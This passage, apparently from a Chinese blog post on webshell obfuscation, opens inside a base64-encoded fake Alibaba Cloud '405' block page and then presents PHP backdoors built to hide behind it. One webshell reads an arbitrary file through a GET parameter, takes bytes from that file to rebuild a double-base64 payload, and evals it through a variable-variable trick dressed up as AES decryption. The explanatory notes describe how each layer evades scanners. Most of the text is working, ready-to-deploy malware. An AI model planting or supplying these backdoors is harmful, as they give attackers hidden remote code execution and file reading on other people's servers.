nQtZmFtaWx5OiDlvq7ova/pm4Xpu5E7CiAgICAgICAgfQoKICAgICAgICBhIHsKICAgICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICAgICBjb2xvcjogIzNiNmVhMzsKICAgICAgICB9CgogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTAwMHB4OwogICAgICAgICAgICBtYXJnaW46IGF1dG87CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmhlYWRlciB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICB9CgogICAgICAgIC5oZWFkZXIgLm1lc3NhZ2UgewogICAgICAgICAgICBoZWlnaHQ6IDM2cHg7CiAgICAgICAgICAgIHBhZGRpbmctbGVmdDogMTIwcHg7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHVybChodHRwczovL2Vycm9ycy5hbGl5dW4uY29tL2ltYWdlcy9UQjFUcGFtSHBYWFhYYUpYWFhYZUI3bllWWFgtMTA0LTE2Mi5wbmcpIG5vLXJlcGVhdCAwIC0xMjhweDsKICAgICAgICAgICAgbGluZS1oZWlnaHQ6IDM2cHg7CiAgICAgICAgfQoKICAgICAgICAubWFpbiB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICAgICAgYmFja2dyb3VuZDoKICAgICAgICAgICAgICAgICNmNGY1Zjc7CiAgICAgICAgfQoKICAgICAgICAubWFpbiBpbWcgewogICAgICAgICAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICAgICAgICAgIGxlZnQ6IDEyMHB4OwogICAgICAgIH0KCiAgICAgICAgLmZvb3RlciB7CiAgICAgICAgICAgIG1hcmdpbi10b3A6CiAgICAgICAgICAgICAgICAzMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiByaWdodDsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYSB7CiAgICAgICAgICAgIHBhZGRpbmc6IDhweCAzMHB4OwogICAgICAgICAgICBib3JkZXItcmFkaXVzOgogICAgICAgICAgICAgICAgMTBweDsKICAgICAgICAgICAgYm9yZGVyOiAxcHggc29saWQgIzRiYWJlYzsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYTpob3ZlciB7CiAgICAgICAgICAgIG9wYWNpdHk6IC44OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0LXNoYWRvdyB7CiAgICAgICAgICAgIGRpc3BsYXk6IG5vbmU7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgdG9wOiAwOwogICAgICAgICAgICBsZWZ0OiAwOwogICAgICAgICAgICB3aWR0aDogMTAwJTsKICAgICAgICAgICAgaGVpZ2h0OgogICAgICAgICAgICAgICAgMTAwJTsKICAgICAgICAgICAgYmFja2dyb3VuZDogIzk5OTsKICAgICAgICAgICAgb3BhY2l0eTogLjU7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgewogICAgICAgICAgICBkaXNwbGF5OiBub25lOwogICAgICAgICAgICBwb3NpdGlvbjoKICAgICAgICAgICAgICAgIGFic29sdXRlOwogICAgICAgICAgICB0b3A6IDIwMHB4OwogICAgICAgICAgICBsZWZ0OiA1MCU7CiAgICAgICAgICAgIHdpZHRoOiA2MDBweDsKICAgICAgICAgICAgbWFyZ2luLWxlZnQ6IC0zMDBweDsKICAgICAgICAgICAgcGFkZGluZy1ib3R0b206CiAgICAgICAgICAgICAgICAyNXB4OwogICAgICAgICAgICBib3JkZXI6IDFweCBzb2xpZCAjZGRkOwogICAgICAgICAgICBib3gtc2hhZG93OiAwIDJweCAycHggMXB4IHJnYmEoMCwgMCwgMCwgLjEpOwogICAgICAgICAgICBiYWNrZ3JvdW5kOiAjZmZmOwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0IGgyIHsKICAgICAgICAgICAgbWFyZ2luOgogICAgICAgICAgICAgICAgMCAycHg7CiAgICAgICAgICAgIHBhZGRpbmc6IDEwcHggMTVweCA1cHggMTVweDsKICAgICAgICAgICAgZm9udC1zaXplOiAxNHB4OwogICAgICAgICAgICBmb250LXdlaWdodDogbm9ybWFsOwogICAgICAgICAgICBib3JkZXItYm90dG9tOiAxcHggc29saWQgI2RkZDsKICAgICAgICB9CgogICAgICAgIC5hbGVydCBhIHsKICAgICAgICAgICAgZGlzcGxheTogYmxvY2s7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgcmlnaHQ6IDEwcHg7CiAgICAgICAgICAgIHRvcDogOHB4OwogICAgICAgICAgICB3aWR0aDogMzBweDsKICAgICAgICAgICAgaGVpZ2h0OiAyMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgcCB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjay1jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTEwcHg7CiAgICAgICAgICAgIG1hcmdpbjogYXV0bzsKICAgICAgICAgICAgbWFyZ2luLXRvcDogMTIwcHg7CiAgICAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICB9CgogICAgICAgICNxcmNvZGUgewogICAgICAgICAgICBtYXJnaW46IDAgMTVweCA1cHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjayBhIHsKICAgICAgICAgICAgY29sb3I6ICM5OTk7CiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTJweDsKICAgICAgICAgICAgbWFyZ2luLXRvcDogNXB4OwogICAgICAgIH0KICAgIDwvc3R5bGU+CjwvaGVhZD4KCjxib2R5IGRhdGEtc3BtPSI3NjYzMzU0Ij4KICAgIDxzY3JpcHQ+CiAgICAgICAgd2l0aCAoZG9jdW1lbnQpIHdpdGggKGJvZHkpIHdpdGggKGluc2VydEJlZm9yZShjcmVhdGVFbGVtZW50KCJzY3JpcHQiKSwgZmlyc3RDaGlsZCkpIHNldEF0dHJpYnV0ZSgiZXhwYXJhbXMiLCAiY2F0ZWdvcnk9JnVzZXJpZD02ODUzMDgyOTUmYXBsdXMmdWRwaWQ9VldlVU9jZVFKZEtqJiZ5dW5pZD0mZTkzYjRlM2U3NWUwNSZ0cmlkPTY1MjViNzk2MTU4MzkyMDYwOTQwMDM5MzhlJmFzaWQ9QVlmNTJDamh0V2hlK2FmK0hRQUFBQUNXQS9TSW5PM1FMdz09IiwgaWQgPSAidGItYmVhY29uLWFwbHVzIiwgc3JjID0gKGxvY2F0aW9uID4gImh0dHBzIiA/ICIvL2ciIDogIi8vZyIpICsgIi5hbGljZG4uY29tL2FsaWxvZy9tbG9nL2FwbHVzX3YyLmpzIikKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdD4KICAgICAgICAvLwogICAgICAgIHZhciBpMThuT2JqZWN0ID0gewogICAgICAgICAgICAiemgtY24iOiB7CiAgICAgICAgICAgICAgICAibWVzc2FnZSI6ICLlvojmirHmrYnvvIznlLHkuo7mgqjorr/pl67nmoRVUkzmnInlj6/og73lr7nnvZHnq5npgKDmiJDlronlhajlqIHog4HvvIzmgqjnmoTorr/pl67ooqvpmLvmlq3jgIIiLAogICAgICAgICAgICAgICAgImJnSW1nIjogImh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vaW1hZ2VzL1RCMTVRR2FIcFhYWFhYT2FYWFhYaWEzOVhYWC02NjAtMTE3LnBuZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIuivr+aKpeWPjemmiCIsCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgICJlbi11cyI6IHsKICAgICAgICAgICAgICAgICJtZXNzYWdlIjogIlNvcnJ5LCB3ZSBoYXZlIGRldGVjdGVkIG1hbGljaW91cyB0cmFmZmljIGZyb20geW91ciBuZXR3b3JrLCBwbGVhc2UgdHJ5IGFnYWluIGxhdGVyLiIsCiAgICAgICAgICAgICAgICAiYmdJbWciOiAiaHR0cHM6Ly9pbWcuYWxpY2RuLmNvbS90ZnMvVEIxQURBT0lGenFLMVJqU1pTZ1hYY3BBVlhhLTEzMjAtMjM0LmpwZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIlJlcG9ydCIsCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgdmFyIGkxOG4gPSBpMThuT2JqZWN0WyJlbi11cyJdOwogICAgICAgIGlmIChuYXZpZ2F0b3IubGFuZ3VhZ2UuaW5kZXhPZigiemgiKSA+PSAwKSB7CiAgICAgICAgICAgIGkxOG4gPSBpMThuT2JqZWN0WyJ6aC1jbiJdOwogICAgICAgIH0KCiAgICA8L3NjcmlwdD4KCiAgICA8ZGl2IGRhdGEtc3BtPSIxOTk4NDEwNTM4Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJoZWFkZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWVzc2FnZSI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLm1lc3NhZ2UpPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0ibWFpbiI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8c2NyaXB0PmRvY3VtZW50LndyaXRlKCc8aW1nIHdpZHRoPSI2NjAiIGhlaWdodD0iMTE3IiBzcmM9IicgKyBpMThuLmJnSW1nICsgJyIvPicpPC9zY3JpcHQ+CgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJmb290ZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2Rpc3BsYXk6bm9uZSc+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgICAgICAgICAgICAgZnVuY3Rpb24gZ2V0UXVlcnlTdHJpbmcodXJsLCBuYW1lKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgcmVnID0gbmV3IFJlZ0V4cCgnKF58JiknICsgbmFtZSArICc9KFteJl0qKSgmfCQpJyk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgciA9IHVybC5zdWJzdHIoMSkubWF0Y2gocmVnKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyICE9PSBudWxsKSByZXR1cm4gdW5lc2NhcGUoclsyXSk7IHJldHVybiBudWxsOwogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciBfX3V1aWRfX18gPSBnZXRRdWVyeVN0cmluZyhsb2NhdGlvbi5ocmVmLCAidXVpZCIpCiAgICAgICAgICAgICAgICAgICAgPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgICAgICAgICA8YSB0YXJnZXQ9Il9ibGFuayIgaWQ9InJlcG9ydCIgaHJlZj0iamF2YXNjcmlwdDo7IiBkYXRhLXNwbS1jbGljaz0iZ29zdHI9L3dhZi4xMjMuMTIzO2xvY2FpZD1kMDAxOyI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLnJlcG9ydCk8L3NjcmlwdD4KICAgICAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImFsZXJ0U2hhZG93IiBjbGFzcz0iYWxlcnQtc2hhZG93Ij4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iYWxlcnRDb250YWluZXIiIGNsYXNzPSJhbGVydCI+CiAgICAgICAgPGgyPgogICAgICAgICAgICDmj5DnpLrvvJoKICAgICAgICAgICAgPGEgaHJlZj0iamF2YXNjcmlwdDo7IiB0aXRsZT0i5YWz6ZetIiBpZD0iY2xvc2VBbGVydCI+CiAgICAgICAgICAgICAgICBYCiAgICAgICAgICAgIDwvYT4KICAgICAgICA8L2gyPgogICAgICAgIDxwPgogICAgICAgICAgICDmhJ/osKLmgqjnmoTlj43ppojvvIzlupTnlKjpmLLngavlopnkvJrlsL3lv6vov5vooYzliIbmnpDlkoznoa7orqTjgIIKICAgICAgICA8L3A+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImZlZWRiYWNrLWNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBpZD0icXJjb2RlIj48L2Rpdj4KICAgICAgICA8ZGl2IGlkPSJmZWVkYmFjayI+PC9kaXY+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQ+CiAgICAgICAgZnVuY3Rpb24gc2hvdygpIHsKICAgICAgICAgICAgdmFyIGcgPSBmdW5jdGlvbiAoZWxlKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoZWxlKTsKICAgICAgICAgICAgfTsKICAgICAgICAgICAgdmFyIHJlcG9ydEhhbmRsZSA9IGcoJ3JlcG9ydCcpOwogICAgICAgICAgICB2YXIgYWxlcnRTaGFkb3cgPSBnKCdhbGVydFNoYWRvdycpOwogICAgICAgICAgICB2YXIgYWxlcnRDb250YWluZXIgPSBnKCdhbGVydENvbnRhaW5lcicpOwogICAgICAgICAgICB2YXIgY2xvc2VBbGVydCA9IGcoJ2Nsb3NlQWxlcnQnKTsKICAgICAgICAgICAgdmFyIG93biA9IHt9OwogICAgICAgICAgICBvd24ucmVwb3J0ID0gZnVuY3Rpb24gKCkgeyAKICAgICAgICAgICAgICAgIG93bi5hbGVydCgpOwogICAgICAgICAgICB9OyBvd24uYWxlcnQgPSBmdW5jdGlvbiAoKSB7IGFsZXJ0U2hhZG93LnN0eWxlLmRpc3BsYXkgPSAnYmxvY2snOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ2Jsb2NrJzsgfTsgb3duLmNsb3NlID0gZnVuY3Rpb24gKCkgeyBhbGVydFNoYWRvdy5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyB9OwogICAgICAgIH07CgogICAgICAgIHZhciB1dWlkID0gbG9jYXRpb24uaHJlZi5tYXRjaCgvdXVpZD0oW14mXSspLyk7CiAgICAgICAgdXVpZCA9IHV1aWQgJiYgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWRbMV0pOwogICAgICAgIHZhciB1cmxRckNvZGUgPSBsb2NhdGlvbi5ocmVmLm1hdGNoKC9xcmNvZGU9KFteJl0rKS8pOwogICAgICAgIHVybFFyQ29kZSA9IHVybFFyQ29kZSAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsUXJDb2RlWzFdKTsKICAgICAgICBpZiAodXVpZCB8fCB1cmxRckNvZGUpIHsKICAgICAgICAgICAgdmFyIHFyY29kZSA9IG5ldyBRUkNvZGUoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInFyY29kZSIpLCB7CiAgICAgICAgICAgICAgICB0ZXh0OiB1cmxRckNvZGUgfHwgdXVpZCwKICAgICAgICAgICAgICAgIHdpZHRoOiA4MCwKICAgICAgICAgICAgICAgIGhlaWdodDogODAsCiAgICAgICAgICAgICAgICBjb2xvckRhcms6ICIjOTk5IiwKICAgICAgICAgICAgfSk7CiAgICAgICAgICAgIHZhciBmZWVkYmFja0xpbmsgPSBnZXRGZWVkYmFja0xpbmsoKTsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImZlZWRiYWNrIikuaW5uZXJIVE1MID0gZmVlZGJhY2tMaW5rOwogICAgICAgIH0KICAgICAgICBmdW5jdGlvbiBnZXRGZWVkYmFja0xpbmsoKSB7CiAgICAgICAgICAgIHZhciB1cmxPcmlnaW47CiAgICAgICAgICAgIHVybE9yaWdpbiA9IGxvY2F0aW9uLmhyZWYubWF0Y2goL29yaWdpbj0oW14mXSspLyk7CiAgICAgICAgICAgIHVybE9yaWdpbiA9IHVybE9yaWdpbiAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsT3JpZ2luWzFdKS5zcGxpdCgiPyIpWzBdOwogICAgICAgICAgICBpZiAodXJsT3JpZ2luKSB7CiAgICAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICAgIHVybE9yaWdpbiA9IG5ldyBVUkwodXJsT3JpZ2luKTsKICAgICAgICAgICAgICAgICAgICBpZiAodXJsT3JpZ2luLnByb3RvY29sICE9PSAiaHR0cHM6IiAmJiB1cmxPcmlnaW4ucHJvdG9jb2wgIT09ICJodHRwOiIpIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSB1cmxPcmlnaW4uaHJlZjsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9IGNhdGNoIChlKSB7CiAgICAgICAgICAgICAgICAgICAgaWYgKHR5cGVvZiB1cmxPcmlnaW4gIT09ICJzdHJpbmciIHx8IHVybE9yaWdpbi5pbmRleE9mKCJodHRwIikgIT09IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSBmaWx0ZXJIdG1sKHVybE9yaWdpbik7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIHZhciBfbGFuZ3VhZ2UgPSBuYXZpZ2F0b3IuYnJvd3Nlckxhbmd1YWdlIHx8IG5hdmlnYXRvci5sYW5ndWFnZTsKICAgICAgICAgICAgdmFyIHRleHQgPSBbInpoLUNOIiwgInpoLWNuIl0uaW5jbHVkZXMoX2xhbmd1YWdlKSA/ICLngrnmiJHlj43ppoggPiIgOiAiQ2xpY2sgdG8gZmVlZGJhY2sgPiI7CiAgICAgICAgICAgIHJldHVybiAnPGEgaHJlZj0iJyArIHVybE9yaWdpbiArICcvX19fX190bWRfX19fXy9wYWdlL2ZlZWRiYWNrP3JhbmQ9UzNXeEdIQWdBdDc1NkVwem53Zk56SnEyQUZBMnFCTmxhM2o2RUlOVVM4V2U5ZGF6TV9pS0VscDhEd1ZTSFpVZXZwQzQxQng3UnppdlhJajlSblpnZGcmdXVpZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWQpICsgJyZ0eXBlPTYiIHRhcmdldD0iX2JsYW5rIj4nICsgdGV4dCArICc8L2E+JzsKICAgICAgICB9OwogICAgICAgIGZ1bmN0aW9uIGZpbHRlckh0bWwoc3RyKSB7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8mL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLz4vZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvPC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8iL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLycvZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvYC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC9qYXZhc2NyaXB0L2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoL2lmcmFtZS9nLCAiIik7CiAgICAgICAgICAgIHJldHVybiBzdHI7CiAgICAgICAgfQoKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGNoYXJzZXQ9InV0Zi04IiBzcmM9Imh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vZXJyb3IuanM/cz0xMCI+CiAgICA8L3NjcmlwdD4KPC9ib2R5PgoKPC9odG1sPg==";
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
header('Content-Type:text/html;charset=utf-8'); http_response_code(405);
echo base64_decode($jWLTwO);
}
|
思路:
先生成了一个name和content作为注释写入代码,并调用查找meta函数找到上面2个的值,并传入token参数,当token参数的值等于name时就会变成content,随后写入username并加入到header里面
从header中查找含有ddddddd参数值并将其中含有content的字符串替换为空,并给template_source赋值
WlhaZYLWcbSbaGJDZ2ZYLWcbSbtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ== => WlhaaGJDZ2ZYLtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ==
1
2
3
4
5
| $key = 'template_source';
$aes_decode[1]=$$key;
@eval($aes_decode[1]);
|
这里表面看上去是一个aes解密函数,实际上是一个自定义变量进行迷惑,最后执行的是注释里的内容
3、base64+动态拼接+替换+文件读取套娃
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| <?php
header('Serve:'.base64_encode(__FILE__));
$password='WlhaaGvTLtwRENJvTLtwRENDZ2tYMvTLtwRENUJQVTFSYkoyTnRaQ2RkS1RzPQ==';
ob_start();
if($_GET['file']){
$a = base64_decode($_GET['file']);
}else{
$a = 'application.xml';
}
readfile($a);
$file = ob_get_contents();
ob_end_clean();
$username = substr($file,8,8);
$template_source = str_replace($username,'',$password);
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
if(@$_GET['file']){
$aes_decode[1]=$$key;
}else{
$aes_decode[1]='echo \'\';';
}
@eval($aes_decode[1]);
$VEIUrP = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9InpoLWNuIj4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9ImRhdGEtc3BtIiBjb250ZW50PSJhM2MwZSIgLz4KICAgIDx0aXRsZT4KICAgICAgICA0MDUKICAgIDwvdGl0bGU+CiAgICA8c2NyaXB0IHNyYz0iLy9nLmFsaWNkbi5jb20vY29kZS9saWIvcXJjb2RlanMvMS4wLjAvcXJjb2RlLm1pbi5qcyI+PC9zY3JpcHQ+CiAgICA8c3R5bGU+CiAgICAgICAgaHRtbCwKICAgICAgICBib2R5LAogICAgICAgIGRpdiwKICAgICAgICBhLAogICAgICAgIGgyLAogICAgICAgIHAgewogICAgICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiDlvq7ova/pm4Xpu5E7CiAgICAgICAgfQoKICAgICAgICBhIHsKICAgICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICAgICBjb2xvcjogIzNiNmVhMzsKICAgICAgICB9CgogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTAwMHB4OwogICAgICAgICAgICBtYXJnaW46IGF1dG87CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmhlYWRlciB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICB9CgogICAgICAgIC5oZWFkZXIgLm1lc3NhZ2UgewogICAgICAgICAgICBoZWlnaHQ6IDM2cHg7CiAgICAgICAgICAgIHBhZGRpbmctbGVmdDogMTIwcHg7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHVybChodHRwczovL2Vycm9ycy5hbGl5dW4uY29tL2ltYWdlcy9UQjFUcGFtSHBYWFhYYUpYWFhYZUI3bllWWFgtMTA0LTE2Mi5wbmcpIG5vLXJlcGVhdCAwIC0xMjhweDsKICAgICAgICAgICAgbGluZS1oZWlnaHQ6IDM2cHg7CiAgICAgICAgfQoKICAgICAgICAubWFpbiB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICAgICAgYmFja2dyb3VuZDoKICAgICAgICAgICAgICAgICNmNGY1Zjc7CiAgICAgICAgfQoKICAgICAgICAubWFpbiBpbWcgewogICAgICAgICAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICAgICAgICAgIGxlZnQ6IDEyMHB4OwogICAgICAgIH0KCiAgICAgICAgLmZvb3RlciB7CiAgICAgICAgICAgIG1hcmdpbi10b3A6CiAgICAgICAgICAgICAgICAzMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiByaWdodDsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYSB7CiAgICAgICAgICAgIHBhZGRpbmc6IDhweCAzMHB4OwogICAgICAgICAgICBib3JkZXItcmFkaXVzOgogICAgICAgICAgICAgICAgMTBweDsKICAgICAgICAgICAgYm9yZGVyOiAxcHggc29saWQgIzRiYWJlYzsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYTpob3ZlciB7CiAgICAgICAgICAgIG9wYWNpdHk6IC44OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0LXNoYWRvdyB7CiAgICAgICAgICAgIGRpc3BsYXk6IG5vbmU7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgdG9wOiAwOwogICAgICAgICAgICBsZWZ0OiAwOwogICAgICAgICAgICB3aWR0aDogMTAwJTsKICAgICAgICAgICAgaGVpZ2h0OgogICAgICAgICAgICAgICAgMTAwJTsKICAgICAgICAgICAgYmFja2dyb3VuZDogIzk5OTsKICAgICAgICAgICAgb3BhY2l0eTogLjU7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgewogICAgICAgICAgICBkaXNwbGF5OiBub25lOwogICAgICAgICAgICBwb3NpdGlvbjoKICAgICAgICAgICAgICAgIGFic29sdXRlOwogICAgICAgICAgICB0b3A6IDIwMHB4OwogICAgICAgICAgICBsZWZ0OiA1MCU7CiAgICAgICAgICAgIHdpZHRoOiA2MDBweDsKICAgICAgICAgICAgbWFyZ2luLWxlZnQ6IC0zMDBweDsKICAgICAgICAgICAgcGFkZGluZy1ib3R0b206CiAgICAgICAgICAgICAgICAyNXB4OwogICAgICAgICAgICBib3JkZXI6IDFweCBzb2xpZCAjZGRkOwogICAgICAgICAgICBib3gtc2hhZG93OiAwIDJweCAycHggMXB4IHJnYmEoMCwgMCwgMCwgLjEpOwogICAgICAgICAgICBiYWNrZ3JvdW5kOiAjZmZmOwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0IGgyIHsKICAgICAgICAgICAgbWFyZ2luOgogICAgICAgICAgICAgICAgMCAycHg7CiAgICAgICAgICAgIHBhZGRpbmc6IDEwcHggMTVweCA1cHggMTVweDsKICAgICAgICAgICAgZm9udC1zaXplOiAxNHB4OwogICAgICAgICAgICBmb250LXdlaWdodDogbm9ybWFsOwogICAgICAgICAgICBib3JkZXItYm90dG9tOiAxcHggc29saWQgI2RkZDsKICAgICAgICB9CgogICAgICAgIC5hbGVydCBhIHsKICAgICAgICAgICAgZGlzcGxheTogYmxvY2s7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgcmlnaHQ6IDEwcHg7CiAgICAgICAgICAgIHRvcDogOHB4OwogICAgICAgICAgICB3aWR0aDogMzBweDsKICAgICAgICAgICAgaGVpZ2h0OiAyMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgcCB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjay1jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTEwcHg7CiAgICAgICAgICAgIG1hcmdpbjogYXV0bzsKICAgICAgICAgICAgbWFyZ2luLXRvcDogMTIwcHg7CiAgICAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICB9CgogICAgICAgICNxcmNvZGUgewogICAgICAgICAgICBtYXJnaW46IDAgMTVweCA1cHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjayBhIHsKICAgICAgICAgICAgY29sb3I6ICM5OTk7CiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTJweDsKICAgICAgICAgICAgbWFyZ2luLXRvcDogNXB4OwogICAgICAgIH0KICAgIDwvc3R5bGU+CjwvaGVhZD4KCjxib2R5IGRhdGEtc3BtPSI3NjYzMzU0Ij4KICAgIDxzY3JpcHQ+CiAgICAgICAgd2l0aCAoZG9jdW1lbnQpIHdpdGggKGJvZHkpIHdpdGggKGluc2VydEJlZm9yZShjcmVhdGVFbGVtZW50KCJzY3JpcHQiKSwgZmlyc3RDaGlsZCkpIHNldEF0dHJpYnV0ZSgiZXhwYXJhbXMiLCAiY2F0ZWdvcnk9JnVzZXJ